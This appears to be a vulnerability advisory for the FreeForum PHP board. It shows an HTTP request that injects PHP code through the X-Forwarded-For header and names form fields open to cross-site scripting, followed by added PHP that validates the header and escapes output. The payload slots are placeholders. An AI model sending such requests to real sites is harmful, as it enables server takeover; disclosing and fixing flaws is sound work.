PoC/Exploit for PHP Code Execution and Multiple XSS in FreeForum

Published Proof of Concept code - PHP Code Execution and Multiple XSS in FreeForum.


1. PHP Code Execution Example.

HTTP Query:

  POST /freeforum/index.php HTTP/1.0
  Host: [host]
  X-Forwarded-For: anyIP<? [code] ?>
  Content-Length: 91

  name=qqq&email=qqq@qqq.com&subject=qqq&text=qqq&mode=postanswer&thread=1&cat=1&submit=Add

2. Cross-Site Scripting Example.

URL: http://[host]/freeforum/index.php

Your name: [XSS]

Subject: [XSS]
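
Server-side handling that closes both input paths shown above. This PHP is an added example, not FreeForum's code and not part of the published PoC. It assumes the forum records the X-Forwarded-For value as the poster's address and later echoes the name and subject fields into HTML; the function names client_ip and h are hypothetical.

```php
<?php
// Added example; client_ip() and h() are hypothetical helper names.

/**
 * Return a client address that is safe to store or log.
 * X-Forwarded-For is set by the client, so it is accepted only when every
 * comma-separated entry parses as an IPv4/IPv6 literal. Anything else
 * (such as "anyIP<? [code] ?>") falls back to the socket peer address.
 */
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        $peer = '0.0.0.0';
    }

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $peer;
    }

    $entries = array_map('trim', explode(',', $xff));
    foreach ($entries as $entry) {
        if (filter_var($entry, FILTER_VALIDATE_IP) === false) {
            return $peer; // reject the whole header, not just the bad entry
        }
    }
    return $entries[0];
}

/** Encode user-supplied text for an HTML body or attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input mirroring the request shape on this page.
$server = [
    'REMOTE_ADDR'          => '192.0.2.10',
    'HTTP_X_FORWARDED_FOR' => 'anyIP<? [code] ?>',
];
$post = ['name' => '<b>qqq</b>', 'subject' => 'qqq" onmouseover="x'];

echo client_ip($server), "\n";   // peer address, header discarded
echo h($post['name']), "\n";     // markup rendered inert
echo h($post['subject']), "\n";  // quotes encoded for attribute use
```

Validated addresses should still be written to data files that the web server does not interpret as PHP, so that a future validation gap cannot turn stored input into executed code.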
